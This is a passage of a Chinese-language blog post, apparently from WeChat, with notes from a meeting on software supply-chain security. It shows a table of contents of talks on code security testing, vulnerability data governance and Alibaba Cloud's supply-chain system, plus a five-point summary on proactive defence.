style="margin-right: 0cm;margin-left: 0cm;"><span style="font-family: &#34;微软雅黑 Light&#34;, sans-serif;font-size: 14px;color: black;letter-spacing: 0.034em;">深入了解学术界的研究切入点、技术流派、核心算法</span><span style="font-family: &#34;微软雅黑 Light&#34;, sans-serif;font-size: 14px;color: black;letter-spacing: 0.034em;">,</span><span style="font-family: &#34;微软雅黑 Light&#34;, sans-serif;font-size: 14px;color: black;letter-spacing: 0.034em;">以及相关的开源基础软件资源。站在巨人的肩膀上，避免点错科技树，浪费宝贵精力。</span></p></li></ul><li><p style="margin-right: 0cm;margin-left: 0cm;"><span style="color: black;font-family: &#34;微软雅黑 Light&#34;, sans-serif;font-size: 14px;letter-spacing: 0.034em;">在多重认知基础上研发根本解</span></p></li><ul class="list-paddingleft-1" style="list-style-type: square;"><li><p style="margin-right: 0cm;margin-left: 0cm;"><span style="font-family: &#34;微软雅黑 Light&#34;, sans-serif;font-size: 14px;color: black;letter-spacing: 0.034em;">在了解学术上游的基础上，我天天浸淫甲方研发现场，理解用户深层诉求，同时也熟悉乙方安全产品能力边界，三重认知有助于找到问题定位清晰、用户诉求强烈、厂商工具能力不匹配、尚未被解决的问题和机会。</span></p></li><li><p style="margin-right: 0cm;margin-left: 0cm;"><span style="font-family: &#34;微软雅黑 Light&#34;, sans-serif;font-size: 14px;color: black;letter-spacing: 0.034em;">啃文献、调代码、做产品、侃大山一样重要，踏实调研，研发根本解，做出能推广应用、兜底靠谱、体验舒服的解决方案，申请专利、发表论文、分享交流，此间不亦乐乎！</span></p></li></ul></ul><p style="margin-right: 0cm;margin-left: 0cm;"><span style="font-size: 14px;"><span style="font-family: &#34;微软雅黑 Light&#34;, sans-serif;color: black;">我从2021年初开始，以软件供应链分析为切入点，试水软件产业自身数字化的探索。选择的路线图是先基于逆向工程对软件供应链进行层层拆解，之后采用再工程幻化万千数字化场景，我认为此法门贴合第一性原理，3年后回首，实践证明亦如是。</span></span></p><h1 style="margin:0cm;"><span style="font-family: &#34;微软雅黑 Light&#34;, sans-serif;color: rgb(20, 50, 77);font-size: 20px;">宝矿：如果你是真剧迷？</span><span style="font-family: &#34;微软雅黑 Light&#34;, sans-serif;color: rgb(20, 50, 77);font-size: 14px;"><o:p></o:p></span></h1><p style="margin-right: 0cm;margin-left: 0cm;"><span style="font-size: 14px;"><span style="font-family: &#34;微软雅黑 Light&#34;, sans-serif;color: black;">巧合的是，上周学术界和工业界都发了两篇供应链、漏洞相关的合集帖，都很具代表性：</span><span lang="EN-US" style="font-family: &#34;微软雅黑 Light&#34;, sans-serif;"><a href="https://mp.weixin.qq.com/s?__biz=MzU4NDU4OTM4OQ==&amp;mid=2247508872&amp;idx=1&amp;sn=16f5c07cecfa9be9cb65551b265e6042&amp;scene=21#wechat_redirect" data-linktype="2">智能化软件开发微访谈讨论汇编合集（第1-30期）</a></span><span lang="EN-US" style="font-family: &#34;微软雅黑 Light&#34;, sans-serif;color: black;">,和</span><span lang="EN-US" style="font-family: &#34;微软雅黑 Light&#34;, sans-serif;"><a href="https://mp.weixin.qq.com/s?__biz=MzI2MjQ1NTA4MA==&amp;mid=2247491230&amp;idx=1&amp;sn=cb118bf9b848207eb83f90fe33b8bd30&amp;scene=21#wechat_redirect" data-linktype="2">关于漏洞闭环管理工具的杂谈| 总第237周</a></span><span style="font-family: &#34;微软雅黑 Light&#34;, sans-serif;color: black;">， 如果您时间确实有限，可先看两篇，</span><span lang="EN-US" style="font-family: &#34;微软雅黑 Light&#34;, sans-serif;"><a href="https://mp.weixin.qq.com/s?__biz=MzU4NDU4OTM4OQ==&amp;mid=2247508492&amp;idx=1&amp;sn=cee2b2ae744cb761f4ef5d9435364afb&amp;scene=21#wechat_redirect" data-linktype="2">智能化软件开发微访谈·第二十九期：开源软件供应链风险分析与治理</a></span><span style="font-family: &#34;微软雅黑 Light&#34;, sans-serif;color: black;">、以及</span><span lang="EN-US" style="font-family: &#34;微软雅黑 Light&#34;, sans-serif;"><a href="https://mp.weixin.qq.com/s?__biz=MzI2MjQ1NTA4MA==&amp;mid=2247490153&amp;idx=1&amp;sn=7004a6e1635391349735deb0b4cce862&amp;scene=21#wechat_redirect" data-linktype="2">银行业漏洞治理实践与展望--漏洞治理的道与术</a></span><span style="font-family: &#34;微软雅黑 Light&#34;, sans-serif;color: black;">。<o:p></o:p></span></span></p><p style="margin-right: 0cm;margin-left: 0cm;"><span style="font-size: 14px;font-family: &#34;微软雅黑 Light&#34;, sans-serif;color: black;">CodeWisdom的高频超乎我想象，陈老师那些天南海北的在线会议，内容都不在30期汇编合集里面，所以您若有空也可以往下瞅瞅本帖，每一章开头都有5个要点总结。</span></p><p style="margin-right: 0cm;margin-left: 0cm;"><span style="font-size: 14px;font-family: &#34;微软雅黑 Light&#34;, sans-serif;color: black;">内容多，门槛高，<span style="color: rgb(250, 0, 0);font-family: &#34;微软雅黑 Light&#34;, sans-serif;font-size: 14px;letter-spacing: 0.578px;text-wrap: wrap;">若您有志于高质量发展，窄门就是捷径！</span><o:p></o:p></span></p><p style="margin-right: 0cm;margin-left: 0cm;"><span style="font-size: 12px;"><span lang="EN-US" style="font-family: &#34;微软雅黑 Light&#34;, sans-serif;color: black;">*以下内容根据会议笔记整理，顺序有所调整，错误疏漏难免，请以讲者的现场演讲内容和</span><span lang="EN-US" style="font-family: &#34;微软雅黑 Light&#34;, sans-serif;"><a href="https://mp.weixin.qq.com/s?__biz=MzkzODU5MTcyMw==&amp;mid=2247494511&amp;idx=1&amp;sn=ef7c238cbdc534940453d66c21190092&amp;scene=21#wechat_redirect" data-linktype="2">官宣</a></span><span style="font-family: &#34;微软雅黑 Light&#34;, sans-serif;color: black;">为准，合议要点和主题要点由LLM生成。本场国防科技大学的余跃老师的OpenI主题，聚焦云计算和算力网，前瞻兼踏实，容我后期再专题笔记，学习跟踪。</span></span><span style="font-size: 14px;font-family: &#34;微软雅黑 Light&#34;, sans-serif;color: black;"><o:p></o:p></span></p><table cellspacing="0" cellpadding="0" title="" summary=""><tbody><tr style="mso-yfti-irow:0;mso-yfti-firstrow:yes;"><td width="478" valign="top" style="border-width: initial;border-style: none;border-color: initial;padding: 4pt;word-break: break-all;"><p style="margin:0cm;"><span style="font-size: 14px;"><strong><span style="font-family: &#34;微软雅黑 Light&#34;, sans-serif;color: black;">目录</span></strong><span lang="EN-US" style="font-family: &#34;微软雅黑 Light&#34;, sans-serif;color: black;"><o:p></o:p></span></span></p></td></tr><tr style="mso-yfti-irow:1;mso-yfti-lastrow:yes;"><td width="463.3333333333333" valign="top" style="border-width: initial;border-style: none;border-color: initial;padding: 4pt;word-break: break-all;"><p style="margin:0cm;"><span style="font-size: 14px;"><span lang="EN-US" style="font-family: &#34;微软雅黑 Light&#34;, sans-serif;color: black;">- </span><span lang="EN-US" style="font-family: &#34;微软雅黑 Light&#34;, sans-serif;">前传：偶遇群星璀璨，开始追剧<o:p></o:p></span></span></p><p style="margin:0cm;"><span style="font-size: 14px;"><span lang="EN-US" style="font-family: &#34;微软雅黑 Light&#34;, sans-serif;color: black;">- </span><span lang="EN-US" style="font-family: &#34;微软雅黑 Light&#34;, sans-serif;">感受：学术洞见与产业方案的双向奔赴<o:p></o:p></span></span></p><p style="margin:0cm;"><span style="font-size: 14px;"><span lang="EN-US" style="font-family: &#34;微软雅黑 Light&#34;, sans-serif;color: black;">- </span><span lang="EN-US" style="font-family: &#34;微软雅黑 Light&#34;, sans-serif;">好奇：为什么积极参加学术活动？<o:p></o:p></span></span></p><p style="margin:0cm;"><span style="font-size: 14px;"><span lang="EN-US" style="font-family: &#34;微软雅黑 Light&#34;, sans-serif;color: black;">- </span><span lang="EN-US" style="font-family: &#34;微软雅黑 Light&#34;, sans-serif;">宝矿：如果你是真剧迷？<o:p></o:p></span></span></p><p style="margin:0cm;"><span style="font-size: 14px;"><span lang="EN-US" style="font-family: &#34;微软雅黑 Light&#34;, sans-serif;color: black;">- </span><span lang="EN-US" style="font-family: &#34;微软雅黑 Light&#34;, sans-serif;">合议1：软件供应链安全如何变被动为主动？<o:p></o:p></span></span></p><p style="margin:0cm;"><span style="font-size: 14px;"><span lang="EN-US" style="font-family: &#34;微软雅黑 Light&#34;, sans-serif;color: black;">    - </span><span lang="EN-US" style="font-family: &#34;微软雅黑 Light&#34;, sans-serif;">合议要点<o:p></o:p></span></span></p><p style="margin:0cm;"><span style="font-size: 14px;"><span lang="EN-US" style="font-family: &#34;微软雅黑 Light&#34;, sans-serif;color: black;">- </span><span lang="EN-US" style="font-family: &#34;微软雅黑 Light&#34;, sans-serif;">合议2：大模型对供应链的机遇和挑战？<o:p></o:p></span></span></p><p style="margin:0cm;"><span style="font-size: 14px;"><span lang="EN-US" style="font-family: &#34;微软雅黑 Light&#34;, sans-serif;color: black;">    - </span><span lang="EN-US" style="font-family: &#34;微软雅黑 Light&#34;, sans-serif;">合议要点<o:p></o:p></span></span></p><p style="margin:0cm;"><span style="font-size: 14px;"><span lang="EN-US" style="font-family: &#34;微软雅黑 Light&#34;, sans-serif;color: black;">- </span><span lang="EN-US" style="font-family: &#34;微软雅黑 Light&#34;, sans-serif;">合议3：高校、企业如何分工合作、协同发展？<o:p></o:p></span></span></p><p style="margin:0cm;"><span style="font-size: 14px;"><span lang="EN-US" style="font-family: &#34;微软雅黑 Light&#34;, sans-serif;color: black;">    - </span><span lang="EN-US" style="font-family: &#34;微软雅黑 Light&#34;, sans-serif;">合议要点<o:p></o:p></span></span></p><p style="margin:0cm;"><span style="font-size: 14px;"><span lang="EN-US" style="font-family: &#34;微软雅黑 Light&#34;, sans-serif;color: black;">- </span><span lang="EN-US" style="font-family: &#34;微软雅黑 Light&#34;, sans-serif;">主题1：代码安全检测与验证关键技术 陈森 天津大学<o:p></o:p></span></span></p><p style="margin:0cm;"><span style="font-size: 14px;"><span lang="EN-US" style="font-family: &#34;微软雅黑 Light&#34;, sans-serif;color: black;">    - </span><span lang="EN-US" style="font-family: &#34;微软雅黑 Light&#34;, sans-serif;">主题要点<o:p></o:p></span></span></p><p style="margin:0cm;"><span style="font-size: 14px;"><span lang="EN-US" style="font-family: &#34;微软雅黑 Light&#34;, sans-serif;color: black;">    - </span><span lang="EN-US" style="font-family: &#34;微软雅黑 Light&#34;, sans-serif;">自主的代码安全架构设计<o:p></o:p></span></span></p><p style="margin:0cm;"><span style="font-size: 14px;"><span lang="EN-US" style="font-family: &#34;微软雅黑 Light&#34;, sans-serif;color: black;">    - </span><span lang="EN-US" style="font-family: &#34;微软雅黑 Light&#34;, sans-serif;">代码安全关键技术研究聚焦安全左移<o:p></o:p></span></span></p><p style="margin:0cm;"><span style="font-size: 14px;"><span lang="EN-US" style="font-family: &#34;微软雅黑 Light&#34;, sans-serif;color: black;">    - </span><span lang="EN-US" style="font-family: &#34;微软雅黑 Light&#34;, sans-serif;">静态应用安全测试SAST<o:p></o:p></span></span></p><p style="margin:0cm;"><span style="font-size: 14px;"><span lang="EN-US" style="font-family: &#34;微软雅黑 Light&#34;, sans-serif;color: black;">        - </span><span lang="EN-US" style="font-family: &#34;微软雅黑 Light&#34;, sans-serif;">问题：大数据集和训练<o:p></o:p></span></span></p><p style="margin:0cm;"><span style="font-size: 14px;"><span lang="EN-US" style="font-family: &#34;微软雅黑 Light&#34;, sans-serif;color: black;">    - </span><span lang="EN-US" style="font-family: &#34;微软雅黑 Light&#34;, sans-serif;">软件成分分析SCA<o:p></o:p></span></span></p><p style="margin:0cm;"><span style="font-size: 14px;"><span lang="EN-US" style="font-family: &#34;微软雅黑 Light&#34;, sans-serif;color: black;">        - </span><span lang="EN-US" style="font-family: &#34;微软雅黑 Light&#34;, sans-serif;">问题：如何做代码克隆分析<o:p></o:p></span></span></p><p style="margin:0cm;"><span style="font-size: 14px;"><span lang="EN-US" style="font-family: &#34;微软雅黑 Light&#34;, sans-serif;color: black;">        - </span><span lang="EN-US" style="font-family: &#34;微软雅黑 Light&#34;, sans-serif;">问题：漏洞的可达性分析。<o:p></o:p></span></span></p><p style="margin:0cm;"><span style="font-size: 14px;"><span lang="EN-US" style="font-family: &#34;微软雅黑 Light&#34;, sans-serif;color: black;">        - </span><span lang="EN-US" style="font-family: &#34;微软雅黑 Light&#34;, sans-serif;">问题：识别脆弱函数<o:p></o:p></span></span></p><p style="margin:0cm;"><span style="font-size: 14px;"><span lang="EN-US" style="font-family: &#34;微软雅黑 Light&#34;, sans-serif;color: black;">        - </span><span lang="EN-US" style="font-family: &#34;微软雅黑 Light&#34;, sans-serif;">问题：修复的版本选择<o:p></o:p></span></span></p><p style="margin:0cm;"><span style="font-size: 14px;"><span lang="EN-US" style="font-family: &#34;微软雅黑 Light&#34;, sans-serif;color: black;">        - </span><span lang="EN-US" style="font-family: &#34;微软雅黑 Light&#34;, sans-serif;">问题：数据的质量问题<o:p></o:p></span></span></p><p style="margin:0cm;"><span style="font-size: 14px;"><span lang="EN-US" style="font-family: &#34;微软雅黑 Light&#34;, sans-serif;color: black;">        - </span><span lang="EN-US" style="font-family: &#34;微软雅黑 Light&#34;, sans-serif;">问题：补丁提交commit定位<o:p></o:p></span></span></p><p style="margin:0cm;"><span style="font-size: 14px;"><span lang="EN-US" style="font-family: &#34;微软雅黑 Light&#34;, sans-serif;color: black;">    - </span><span lang="EN-US" style="font-family: &#34;微软雅黑 Light&#34;, sans-serif;">代码安全技术演进<o:p></o:p></span></span></p><p style="margin:0cm;"><span style="font-size: 14px;"><span lang="EN-US" style="font-family: &#34;微软雅黑 Light&#34;, sans-serif;color: black;">        - </span><span lang="EN-US" style="font-family: &#34;微软雅黑 Light&#34;, sans-serif;">问题：漏洞报告太多，哪些是需要修复的<o:p></o:p></span></span></p><p style="margin:0cm;"><span style="font-size: 14px;"><span lang="EN-US" style="font-family: &#34;微软雅黑 Light&#34;, sans-serif;color: black;">        - </span><span lang="EN-US" style="font-family: &#34;微软雅黑 Light&#34;, sans-serif;">问题：poc的质量参差不齐，需要增强<o:p></o:p></span></span></p><p style="margin:0cm;"><span style="font-size: 14px;"><span lang="EN-US" style="font-family: &#34;微软雅黑 Light&#34;, sans-serif;color: black;">        - </span><span lang="EN-US" style="font-family: &#34;微软雅黑 Light&#34;, sans-serif;">问题：恶意代码怎么检测并进行行为剖析？<o:p></o:p></span></span></p><p style="margin:0cm;"><span style="font-size: 14px;"><span lang="EN-US" style="font-family: &#34;微软雅黑 Light&#34;, sans-serif;color: black;">        - </span><span lang="EN-US" style="font-family: &#34;微软雅黑 Light&#34;, sans-serif;">问题：POC触发漏洞有很多工作要做<o:p></o:p></span></span></p><p style="margin:0cm;"><span style="font-size: 14px;"><span lang="EN-US" style="font-family: &#34;微软雅黑 Light&#34;, sans-serif;color: black;">        - </span><span lang="EN-US" style="font-family: &#34;微软雅黑 Light&#34;, sans-serif;">问题：漏洞函数如何定位，逆向捕捉<o:p></o:p></span></span></p><p style="margin:0cm;"><span style="font-size: 14px;"><span lang="EN-US" style="font-family: &#34;微软雅黑 Light&#34;, sans-serif;color: black;">        - </span><span lang="EN-US" style="font-family: &#34;微软雅黑 Light&#34;, sans-serif;">问题：怎么看sonarqube？<o:p></o:p></span></span></p><p style="margin:0cm;"><span style="font-size: 14px;"><span lang="EN-US" style="font-family: &#34;微软雅黑 Light&#34;, sans-serif;color: black;">        - </span><span lang="EN-US" style="font-family: &#34;微软雅黑 Light&#34;, sans-serif;">问题：依赖到什么程度才算依赖一个组件？<o:p></o:p></span></span></p><p style="margin:0cm;"><span style="font-size: 14px;"><span lang="EN-US" style="font-family: &#34;微软雅黑 Light&#34;, sans-serif;color: black;">- </span><span lang="EN-US" style="font-family: &#34;微软雅黑 Light&#34;, sans-serif;">主题2：开源代码漏洞治理 张源 复旦大学<o:p></o:p></span></span></p><p style="margin:0cm;"><span style="font-size: 14px;"><span lang="EN-US" style="font-family: &#34;微软雅黑 Light&#34;, sans-serif;color: black;">    - </span><span lang="EN-US" style="font-family: &#34;微软雅黑 Light&#34;, sans-serif;">主题要点<o:p></o:p></span></span></p><p style="margin:0cm;"><span style="font-size: 14px;"><span lang="EN-US" style="font-family: &#34;微软雅黑 Light&#34;, sans-serif;color: black;">    - </span><span lang="EN-US" style="font-family: &#34;微软雅黑 Light&#34;, sans-serif;">供应链安全的重要性与挑战<o:p></o:p></span></span></p><p style="margin:0cm;"><span style="font-size: 14px;"><span lang="EN-US" style="font-family: &#34;微软雅黑 Light&#34;, sans-serif;color: black;">    - </span><span lang="EN-US" style="font-family: &#34;微软雅黑 Light&#34;, sans-serif;">软件安全新视角<o:p></o:p></span></span></p><p style="margin:0cm;"><span style="font-size: 14px;"><span lang="EN-US" style="font-family: &#34;微软雅黑 Light&#34;, sans-serif;color: black;">        - </span><span lang="EN-US" style="font-family: &#34;微软雅黑 Light&#34;, sans-serif;">问题：如何发现更多漏洞<o:p></o:p></span></span></p><p style="margin:0cm;"><span style="font-size: 14px;"><span lang="EN-US" style="font-family: &#34;微软雅黑 Light&#34;, sans-serif;color: black;">        - </span><span lang="EN-US" style="font-family: &#34;微软雅黑 Light&#34;, sans-serif;">问题：如何验证漏洞严重性<o:p></o:p></span></span></p><p style="margin:0cm;"><span style="font-size: 14px;"><span lang="EN-US" style="font-family: &#34;微软雅黑 Light&#34;, sans-serif;color: black;">        - </span><span lang="EN-US" style="font-family: &#34;微软雅黑 Light&#34;, sans-serif;">问题：如何开发漏洞补丁<o:p></o:p></span></span></p><p style="margin:0cm;"><span style="font-size: 14px;"><span lang="EN-US" style="font-family: &#34;微软雅黑 Light&#34;, sans-serif;color: black;">        - </span><span lang="EN-US" style="font-family: &#34;微软雅黑 Light&#34;, sans-serif;">问题：如何部署漏洞补丁<o:p></o:p></span></span></p><p style="margin:0cm;"><span style="font-size: 14px;"><span lang="EN-US" style="font-family: &#34;微软雅黑 Light&#34;, sans-serif;color: black;">        - </span><span lang="EN-US" style="font-family: &#34;微软雅黑 Light&#34;, sans-serif;">问题：如何及时捕获披露的漏洞<o:p></o:p></span></span></p><p style="margin:0cm;"><span style="font-size: 14px;"><span lang="EN-US" style="font-family: &#34;微软雅黑 Light&#34;, sans-serif;color: black;">        - </span><span lang="EN-US" style="font-family: &#34;微软雅黑 Light&#34;, sans-serif;">问题：如何精确排查漏洞影响<o:p></o:p></span></span></p><p style="margin:0cm;"><span style="font-size: 14px;"><span lang="EN-US" style="font-family: &#34;微软雅黑 Light&#34;, sans-serif;color: black;">        - </span><span lang="EN-US" style="font-family: &#34;微软雅黑 Light&#34;, sans-serif;">问题：如何有效定位漏洞补丁<o:p></o:p></span></span></p><p style="margin:0cm;"><span style="font-size: 14px;"><span lang="EN-US" style="font-family: &#34;微软雅黑 Light&#34;, sans-serif;color: black;">        - </span><span lang="EN-US" style="font-family: &#34;微软雅黑 Light&#34;, sans-serif;">问题：如何快速修复相关系统<o:p></o:p></span></span></p><p style="margin:0cm;"><span style="font-size: 14px;"><span lang="EN-US" style="font-family: &#34;微软雅黑 Light&#34;, sans-serif;color: black;">    - </span><span lang="EN-US" style="font-family: &#34;微软雅黑 Light&#34;, sans-serif;">漏洞挖掘是核心<o:p></o:p></span></span></p><p style="margin:0cm;"><span style="font-size: 14px;"><span lang="EN-US" style="font-family: &#34;微软雅黑 Light&#34;, sans-serif;color: black;">    - </span><span lang="EN-US" style="font-family: &#34;微软雅黑 Light&#34;, sans-serif;">漏洞数据三要素<o:p></o:p></span></span></p><p style="margin:0cm;"><span style="font-size: 14px;"><span lang="EN-US" style="font-family: &#34;微软雅黑 Light&#34;, sans-serif;color: black;">    - </span><span lang="EN-US" style="font-family: &#34;微软雅黑 Light&#34;, sans-serif;">漏洞数据增强：影响版本<o:p></o:p></span></span></p><p style="margin:0cm;"><span style="font-size: 14px;"><span lang="EN-US" style="font-family: &#34;微软雅黑 Light&#34;, sans-serif;color: black;">    - </span><span lang="EN-US" style="font-family: &#34;微软雅黑 Light&#34;, sans-serif;">漏洞数据增强：危害性<o:p></o:p></span></span></p><p style="margin:0cm;"><span style="font-size: 14px;"><span lang="EN-US" style="font-family: &#34;微软雅黑 Light&#34;, sans-serif;color: black;">    - </span><span lang="EN-US" style="font-family: &#34;微软雅黑 Light&#34;, sans-serif;">漏洞数据增强：修复补丁<o:p></o:p></span></span></p><p style="margin:0cm;"><span style="font-size: 14px;"><span lang="EN-US" style="font-family: &#34;微软雅黑 Light&#34;, sans-serif;color: black;">    - </span><span lang="EN-US" style="font-family: &#34;微软雅黑 Light&#34;, sans-serif;">漏洞治理：部署补丁是主要方式<o:p></o:p></span></span></p><p style="margin:0cm;"><span style="font-size: 14px;"><span lang="EN-US" style="font-family: &#34;微软雅黑 Light&#34;, sans-serif;color: black;">- </span><span lang="EN-US" style="font-family: &#34;微软雅黑 Light&#34;, sans-serif;">主题3：开源漏洞数据治理 吴苏晟 复旦大学<o:p></o:p></span></span></p><p style="margin:0cm;"><span style="font-size: 14px;"><span lang="EN-US" style="font-family: &#34;微软雅黑 Light&#34;, sans-serif;color: black;">    - </span><span lang="EN-US" style="font-family: &#34;微软雅黑 Light&#34;, sans-serif;">主题要点<o:p></o:p></span></span></p><p style="margin:0cm;"><span style="font-size: 14px;"><span lang="EN-US" style="font-family: &#34;微软雅黑 Light&#34;, sans-serif;color: black;">    - </span><span lang="EN-US" style="font-family: &#34;微软雅黑 Light&#34;, sans-serif;">数据分析<o:p></o:p></span></span></p><p style="margin:0cm;"><span style="font-size: 14px;"><span lang="EN-US" style="font-family: &#34;微软雅黑 Light&#34;, sans-serif;color: black;">        - </span><span lang="EN-US" style="font-family: &#34;微软雅黑 Light&#34;, sans-serif;">问题：漏洞数据库补丁质量不理想<o:p></o:p></span></span></p><p style="margin:0cm;"><span style="font-size: 14px;"><span lang="EN-US" style="font-family: &#34;微软雅黑 Light&#34;, sans-serif;color: black;">        - </span><span lang="EN-US" style="font-family: &#34;微软雅黑 Light&#34;, sans-serif;">问题：如何针对库、生态进行影响分析<o:p></o:p></span></span></p><p style="margin:0cm;"><span style="font-size: 14px;"><span lang="EN-US" style="font-family: &#34;微软雅黑 Light&#34;, sans-serif;color: black;">        - </span><span lang="EN-US" style="font-family: &#34;微软雅黑 Light&#34;, sans-serif;">问题：如何确定漏洞影响的版本<o:p></o:p></span></span></p><p style="margin:0cm;"><span style="font-size: 14px;"><span lang="EN-US" style="font-family: &#34;微软雅黑 Light&#34;, sans-serif;color: black;">    - </span><span lang="EN-US" style="font-family: &#34;微软雅黑 Light&#34;, sans-serif;">Tracer: 基于多源知识融合的补丁追踪方法<o:p></o:p></span></span></p><p style="margin:0cm;"><span style="font-size: 14px;"><span lang="EN-US" style="font-family: &#34;微软雅黑 Light&#34;, sans-serif;color: black;">    - </span><span lang="EN-US" style="font-family: &#34;微软雅黑 Light&#34;, sans-serif;">Holmes：由CVE识别影响库及所属生态<o:p></o:p></span></span></p><p style="margin:0cm;"><span style="font-size: 14px;"><span lang="EN-US" style="font-family: &#34;微软雅黑 Light&#34;, sans-serif;color: black;">    - </span><span lang="EN-US" style="font-family: &#34;微软雅黑 Light&#34;, sans-serif;">Prism：开源漏洞影响版本的分析方法<o:p></o:p></span></span></p><p style="margin:0cm;"><span style="font-size: 14px;"><span lang="EN-US" style="font-family: &#34;微软雅黑 Light&#34;, sans-serif;color: black;">    - </span><span lang="EN-US" style="font-family: &#34;微软雅黑 Light&#34;, sans-serif;">伏羲平台<o:p></o:p></span></span></p><p style="margin:0cm;"><span style="font-size: 14px;"><span lang="EN-US" style="font-family: &#34;微软雅黑 Light&#34;, sans-serif;color: black;">- </span><span lang="EN-US" style="font-family: &#34;微软雅黑 Light&#34;, sans-serif;">主题4：龙蜥软件供应链安全体系 郑耿 阿里云<o:p></o:p></span></span></p><p style="margin:0cm;"><span style="font-size: 14px;"><span lang="EN-US" style="font-family: &#34;微软雅黑 Light&#34;, sans-serif;color: black;">    - </span><span lang="EN-US" style="font-family: &#34;微软雅黑 Light&#34;, sans-serif;">主题要点<o:p></o:p></span></span></p><p style="margin:0cm;"><span style="font-size: 14px;"><span lang="EN-US" style="font-family: &#34;微软雅黑 Light&#34;, sans-serif;color: black;">    - </span><span lang="EN-US" style="font-family: &#34;微软雅黑 Light&#34;, sans-serif;">龙蜥为什么关注供应链<o:p></o:p></span></span></p><p style="margin:0cm;"><span style="font-size: 14px;"><span lang="EN-US" style="font-family: &#34;微软雅黑 Light&#34;, sans-serif;color: black;">    - </span><span lang="EN-US" style="font-family: &#34;微软雅黑 Light&#34;, sans-serif;">研发流程<o:p></o:p></span></span></p><p style="margin:0cm;"><span style="font-size: 14px;"><span lang="EN-US" style="font-family: &#34;微软雅黑 Light&#34;, sans-serif;color: black;">    - </span><span lang="EN-US" style="font-family: &#34;微软雅黑 Light&#34;, sans-serif;">供应链安全架构<o:p></o:p></span></span></p><p style="margin:0cm;"><span style="font-size: 14px;"><span lang="EN-US" style="font-family: &#34;微软雅黑 Light&#34;, sans-serif;color: black;">    - </span><span lang="EN-US" style="font-family: &#34;微软雅黑 Light&#34;, sans-serif;">体系落地<o:p></o:p></span></span></p><p style="margin:0cm;"><span style="font-size: 14px;"><span lang="EN-US" style="font-family: &#34;微软雅黑 Light&#34;, sans-serif;color: black;">    - </span><span lang="EN-US" style="font-family: &#34;微软雅黑 Light&#34;, sans-serif;">体系参考了SLSA和S2C2F<o:p></o:p></span></span></p><p style="margin:0cm;"><span style="font-size: 14px;"><span lang="EN-US" style="font-family: &#34;微软雅黑 Light&#34;, sans-serif;color: black;">    - </span><span lang="EN-US" style="font-family: &#34;微软雅黑 Light&#34;, sans-serif;">SBOM作为体系构建抓手<o:p></o:p></span></span></p><p style="margin:0cm;"><span style="font-size: 14px;"><span lang="EN-US" style="font-family: &#34;微软雅黑 Light&#34;, sans-serif;color: black;">    - </span><span lang="EN-US" style="font-family: &#34;微软雅黑 Light&#34;, sans-serif;">核心能力1：知识图谱<o:p></o:p></span></span></p><p style="margin:0cm;"><span style="font-size: 14px;"><span lang="EN-US" style="font-family: &#34;微软雅黑 Light&#34;, sans-serif;color: black;">    - </span><span lang="EN-US" style="font-family: &#34;微软雅黑 Light&#34;, sans-serif;">核心能力2：统一签名服务<o:p></o:p></span></span></p><p style="margin:0cm;"><span style="font-size: 14px;"><span lang="EN-US" style="font-family: &#34;微软雅黑 Light&#34;, sans-serif;color: black;">    - </span><span lang="EN-US" style="font-family: &#34;微软雅黑 Light&#34;, sans-serif;">核心能力3：可重现构建<o:p></o:p></span></span></p><p style="margin:0cm;"><span style="font-size: 14px;"><span lang="EN-US" style="font-family: &#34;微软雅黑 Light&#34;, sans-serif;color: black;">    - </span><span lang="EN-US" style="font-family: &#34;微软雅黑 Light&#34;, sans-serif;">核心能力4：大规模代码克隆检测<o:p></o:p></span></span></p><p style="margin:0cm;"><span style="font-size: 14px;"><span lang="EN-US" style="font-family: &#34;微软雅黑 Light&#34;, sans-serif;color: black;">    - </span><span lang="EN-US" style="font-family: &#34;微软雅黑 Light&#34;, sans-serif;">核心能力5：AI for代码安全<o:p></o:p></span></span></p><p style="margin:0cm;"><span style="font-size: 14px;"><span lang="EN-US" style="font-family: &#34;微软雅黑 Light&#34;, sans-serif;color: black;">    - </span><span lang="EN-US" style="font-family: &#34;微软雅黑 Light&#34;, sans-serif;">未来规划<o:p></o:p></span></span></p><p style="text-align:center;margin:0cm;"><span style="font-family: &#34;微软雅黑 Light&#34;, sans-serif;color: black;font-size: 14px;"> <o:p></o:p></span></p></td></tr></tbody></table><h1 style="margin:0cm;"><span style="font-family: &#34;微软雅黑 Light&#34;, sans-serif;color: rgb(30, 78, 121);font-size: 20px;">合议1：软件供应链安全如何变被动应对为主动防御？</span><span style="font-size: 14px;font-family: &#34;微软雅黑 Light&#34;, sans-serif;color: rgb(30, 78, 121);"><o:p></o:p></span></h1><table cellspacing="0" cellpadding="0" title="" summary=""><tbody><tr style="mso-yfti-irow:0;mso-yfti-firstrow:yes;mso-yfti-lastrow:yes;"><td width="463.3333333333333" valign="top" style="border-width: 1pt;border-style: solid;border-color: rgb(163, 163, 163);padding: 4pt;"><h2 style="margin:0cm;"><span style="font-family: &#34;微软雅黑 Light&#34;, sans-serif;color: rgb(39, 98, 150);font-size: 14px;">合议要点<o:p></o:p></span></h2><p style="margin:0cm;"><span style="font-size: 14px;font-family: &#34;微软雅黑 Light&#34;, sans-serif;color: black;">1. 安全左移,尽早防御和识别风险,减少攻击面。如编码阶段风险识别、CICD流程安全检测卡点等。<o:p></o:p></span></p><p style="margin:0cm;"><span style="font-size: 14px;font-family: &#34;微软雅黑 Light&#34;, sans-serif;color: black;">2. 供应链安全管理,识别各环节安全威胁,采取主动防御措施,如依赖准入评估、依赖链扫描等。<o:p></o:p></span></p><p style="margin:0cm;"><span style="font-size: 14px;font-family: &#34;微软雅黑 Light&#34;, sans-serif;color: black;">3. 针对未知漏洞,采取内生安全措施,使系统能在有漏洞情况下正常运行。<o:p></o:p></span></p><p style="margin:0cm;"><span style="font-size: 14px;"><span lang="EN-US" style="font-family: &#34;微软雅黑 Light&#34;, sans-serif;color: black;">4. 对已知漏洞,建立跨企业的共享漏洞库、指纹库等,精确刻画漏洞根因,建立</span><span style="font-family: &#34;微软雅黑 Light&#34;, sans-serif;color: rgb(250, 0, 0);">致病基因知识库</span><span style="font-family: &#34;微软雅黑 Light&#34;, sans-serif;color: black;">。</span><span lang="EN-US" style="font-family: &#34;微软雅黑 Light&#34;, sans-serif;"><o:p></o:p></span></span></p><p style="margin:0cm;"><span style="font-size: 14px;font-family: &#34;微软雅黑 Light&#34;, sans-serif;color: black;">5. 攻击造成后果时,总结攻击模式,根据模式改善防御,形成动态的管理和保障机制。<o:p></o:p></span></p></td></tr></tbody></table><p style="margin-right: 0cm;margin-left: 0cm;"><span style="font-size: 14px;"><span style="font-family: 